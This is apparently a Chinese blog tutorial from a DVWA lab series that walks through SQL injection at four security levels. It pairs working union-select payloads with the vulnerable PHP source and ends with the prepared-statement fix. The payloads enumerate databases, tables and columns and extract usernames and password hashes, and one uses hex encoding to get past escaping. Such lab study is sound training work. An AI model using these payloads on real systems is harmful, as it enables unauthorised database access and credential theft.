【工具-DVWA】DVWA渗透系列七:SQL Injection

最新推荐文章于 2022-04-25 16:51:56 发布
最新推荐文章于 2022-04-25 16:51:56 发布
阅读量2.8k 收藏 23
点赞数 5
分类专栏: # 工具 文章标签: DVWA SQL Injection
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qqchaozai/article/details/102726879
版权
本文深入解析SQL注入攻击,涵盖从基础概念到高级技巧的全面内容。通过实例演示如何在不同安全级别下实施渗透测试,包括暴力破解、命令注入、文件上传等多种攻击方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

DVWA安装使用介绍,见:【工具-DVWA】DVWA的安装和使用

本渗透系列包含最新DVWA的14个渗透测试样例:

1.Brute Force(暴力破解)                    
2.Command Injection(命令注入)
3.CSRF(跨站请求伪造)                        
4.File Inclusion(文件包含)
5.File Upload(文件上传)                    
6.Insecure CAPTCHA(不安全的验证码)
7.SQL Injection(SQL注入)                    
8.SQL Injection(Blind)(SQL盲注)
9.Weak Session IDs(有问题的会话ID)                
10.XSS(DOM)(DOM型xss)
11.XSS(ref)(反射型xss)                    
12.XSS(Stored)(存储型xss)
13.CSP Bypass(Content Security Policy内容安全策略,旁路/绕过)    
14.JavaScript​​​​​​​

安全级别分低、中、高、安全四个级别来分析SQL Injection的渗透测试过程。

1 基础知识

  • SQL Injection-SQL注入

通过任意手段,达到让程序执行恶意SQL代码的目的。

  • 任意手段

表单提交;任何后端可利用的接口;可能被后端读取并添加到SQL中的上传文件名等等

  • 注入目的

获取或超控数据库里的数据

  • 注入过程
  1. 判断是否有SQL注入漏洞
  2. 判断SQL所查询字段的个数
  3. 判断SQL中查询字段与界面显示字段的对应关系
  4. 获取当前数据库
  5. 获取数据库中的表
  6. 获取表中的字段名
  7. 获取表中的数据

2 Low

2.1 渗透测试

  • 确认有SQL注入漏洞,使用【#】截断后续SQL语句(PS:注意中英文的冒号哦
1' or 1 =1 #

  • 确认SQL所查询字段的个数为2个(order 3时出现异常)
1' or 1=1 order by 2 #

  • 确认SQL中查询字段与界面显示字段的对应关系:First name对应第一个字段,Surname对应第二个
9527' union select 1,2 #

  • 获取当前数据库:dvwa
9527' union select 1,database() #

  • 获取数据库中的表:guestbook,users
9527' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

  • 获取表中的字段名:以users为例:user_id,first_name,last_name,user,password,avatar,last_login,failed_login
9527' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

  • 获取表中的数据:见图
9527' union select group_concat(user_id,'-',first_name,'-',last_name),group_concat(password) from users #

2.2 源码分析

分析:字符型注入漏洞,没有任何过滤和效验

$id = $_REQUEST[ 'id' ];

// Check database
$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
	// Get values
	$first = $row["first_name"];
	$last  = $row["last_name"];

	// Feedback for end user
	$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}

3 Medium

3.1 渗透测试

  • 发现:不能通过页面输入,咋办?使用burpsuite拦截修改!

返回:SQL错误,咋不行了?

  • 试试数字型注入,成功!
1 or 1=1 #

  • 后续渗透过程和Low的类似,除了获取表中的字段名这一步,由于使用了【'users'】,有单引号!后台可能做了效验或者转义,所以ID也用了数字查询,特意没有用字符查询,咋办?采用Hex(16进制)编码可以绕过,users的编码是:7573657273!
id=9527 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

3.2 源码分析

发现:使用了mysql_real_escape_string,对特殊符号\x00,\n,\r,\,’,”,\x1a进行转义,所以可以采用Hex编码绕过。

$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

4 High

4.1 渗透测试

发现:居然又换了花样,采用弹框式,发起注入请求的页面和结构展示页面不是同一个,但是整个渗透过程和Low一模一样!

4.2 源码分析

high.php:发现添加了LIMIT 1,由于我们注入SQL后面一直都加了【#】,所以这个新增条件,对渗透过程没产生影响。

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";

5 Impossible

源码分析:采用了PDO的方式处理SQL请求,数据与逻辑分离,等同于Java里的预处理。

$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();

6 总结

一句话:没有采用预处理方式的,都可能存在SQL注入漏洞,黑名单总有可能被绕过!

 

 

爱家人,爱生活,爱设计,爱编程,拥抱精彩人生!

DVWA系列)——使用Burpsuite进行SQL Injection(Blind)(SQL盲注)
橘子女侠
05-06 4381
1. SQL盲注简介 (1)SQL盲注 SQL Injection(Blind),即SQL盲注; 注入:可以查看到详细内容; 盲注:目标只会回复是或不是,没有详细内容; (2)手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是d啊?”,通过这种机械的询问,最终获得...
渗透测试】 sqlmap工具注入-基于dvwasql injection_dvwa sql注入 sqlmap
最新发布
2401_84968269的博客
05-13 1214
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
灵活地运用SQL Injection做数据库渗透
06-12 746
文章作者:cawan信息来源:邪恶八进制安全小组如何灵活地运用SQL Injection做数据库渗透的一种思路如今,很多关于mssql数据库的渗透技巧已不能有效地获取有用的数据值。比如在一个怀疑是注入点的地方 www.xxxxx.com/blog.asp?id=4当加入" "符号进行注入测试时,www.xxxxx.com/blog.asp?id=4出错信息是,[Microsoft][ODBC
DVWASQL Injection
baynk的博客
10-29 1760
汇总链接: https://baynk.blog.youkuaiyun.com/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
DVWA系列SQL Injection SQL注入(源码分析&漏洞利用)
Pluto.的博客
03-12 3190
文章目录DVWASQL Injection SQL注入一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别 DVWA SQL Injection SQL注入 一、Low 级别 对来自客户端的参数id没有进行任何的检查与过滤 查询 id 为1 判断注入是字符型还是数字型 注入 1' 发现报错信息为: You have an error in your SQL syntax; check the manual that corresponds to your M
DVWA sql注入-HIGH
m0_46616663的博客
05-26 277
1.判断是否存在sql注入漏洞 看到Click [here to change your ID]页面做了自动跳转,防御了自动化的sql注入 出现报错,存在sql注入 2.判断注入漏洞的类型 不是数字型注入 可以看到这个为字符型注入 3.猜解数据库 猜解并验证列数 数据库字段为2 获取数据库信息 查询用户名和数据库名 爆表名 爆出users中的字段名 获取字段中的user和password ...
2020-12-06-DVWAsql.md
01-24
### DVWASQL Injection知识点详解 #### 一、SQL Injection概念 SQL InjectionSQL注入)是一种常见的Web应用程序安全漏洞,攻击者通过将恶意SQL代码插入应用程序的输入字段中,从而改变原有SQL语句的逻辑,进而...
WEB安全之:SQL Injection--DVWA环境测试
f_carey的博客
03-05 281
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 SQL Injection -- DVWA环境测试1 SQL Injection 概述2 环境准备2.1 下载靶机2.2 安装靶机2.3 修改 `dvwa` 下的 `login.php` 文件3 SQL Injection 绕过登陆验证测试4 low 等级下 SQL Injection 检测方法测试4.1 正.
渗透测试学习2---DVWASQL Injection
正在学习的路上...
04-26 340
1.low PHP源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; ...
DVWA--- sql注入(SQL Injection)
qq_43168364的博客
05-31 482
SQL Injection 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 首先判断注入点 由回显可知注入点就在输入框中,也可以在URL中进行注入。接下来判断注入类型。另id=1’ 根据回显判断有可能是字符型注入点,使用and进行闭合看看是否是字符型注入点。 闭合后回显正常就是字符型注入点,这里尝试使用联合查询进行进行注入,首先判断它的字段数。 二、Medium级别 三、High级别 四、Impossible级别
DVWA下的SQL注入
07-25
SQL
浅谈sql注入式(SQL injection)攻击与防范
12-16
浅谈sql注入式(SQL injection)攻击与防范
DVWASQL Injection
鸣蜩十四的博客
06-21 278
SQL Injection: 绕过空格(注释符/* */,%a0) 括号绕过空格 引号绕过(使用十六进制) %df%5c%27 逗号绕过(使用from或者offset) or and xor not绕过:and=&& or=|| xor=| not=! 绕过注释符号(#,--(后面跟一个空格))过滤:id=1' union select 1,2,3||'1 =绕过: 使用like 、rlike 、regexp 或者 使用< 或者 > 绕过union,select,wh...
dvwasql injection
Alsn86的博客
01-18 306
dvwasql injection low,php,没有任何过滤,把sql搜索到的所有记录都输出来 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $html .=$query;//自
DVWA-SQL Injection
qq_45751902的博客
04-25 245
目录简介sql注入漏洞原理SQL注入漏洞类型危害安全级别:Low查看源码源码分析数据库名表名列名字段值安全级别:Medium查看源码源码分析数据库名表名列名字段值安全级别:High查看源码源码分析闭合符号为`’`判断列数数据库名表名列名数据安全级别:Impossible查看源码源码分析防护总结 简介 sql注入漏洞原理 将恶意的SQL语句拼接到合法的语句中,从而达到执行SQL语句的目的; SQL注入漏洞类型 字符型; 数字型; 搜索型; 危害 攻击者未经授权可以访问数据库中的数据,盗取用户的隐私
DVWA--SQL注入(SQL Injection)--HIgh
JakeLin's Blog
06-16 451
DVWA--SQL注入(SQL Injection)--Low DVWA--SQL注入(SQL Injection)--Medium 级别:High 实际和Low级别一样,进行SQL注入,参考Low 后台源码 <?php if( isset( $_SESSION [ 'id' ] ) ) { // Get input $id = $_SESSION[ 'id' ]; // Check database $query = "SELECT ..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qqchaozai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值